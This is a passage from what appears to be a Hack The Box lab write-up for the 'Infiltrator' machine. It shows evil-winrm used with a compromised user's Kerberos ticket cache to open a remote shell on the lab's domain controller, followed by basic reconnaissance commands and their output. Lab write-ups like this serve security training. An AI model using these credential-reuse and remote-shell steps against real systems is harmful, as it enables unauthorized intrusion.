WinRM
The m.harris user is able to WinRM to the dc01.infiltrator.htb host from having a membership to the remote management users group. The user has been compromised
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=m.harris@dc01.infiltrator.htb.ccache evil-winrm -i dc01.infiltrator.htb -r INFILTRATOR.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\M.harris\Documents> whoami
infiltrator\m.harris
*Evil-WinRM* PS C:\Users\M.harris\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\M.harris\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.31
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2Initial Foothold established to the dc01.infiltrator.htb host as the m.harris user via WinRM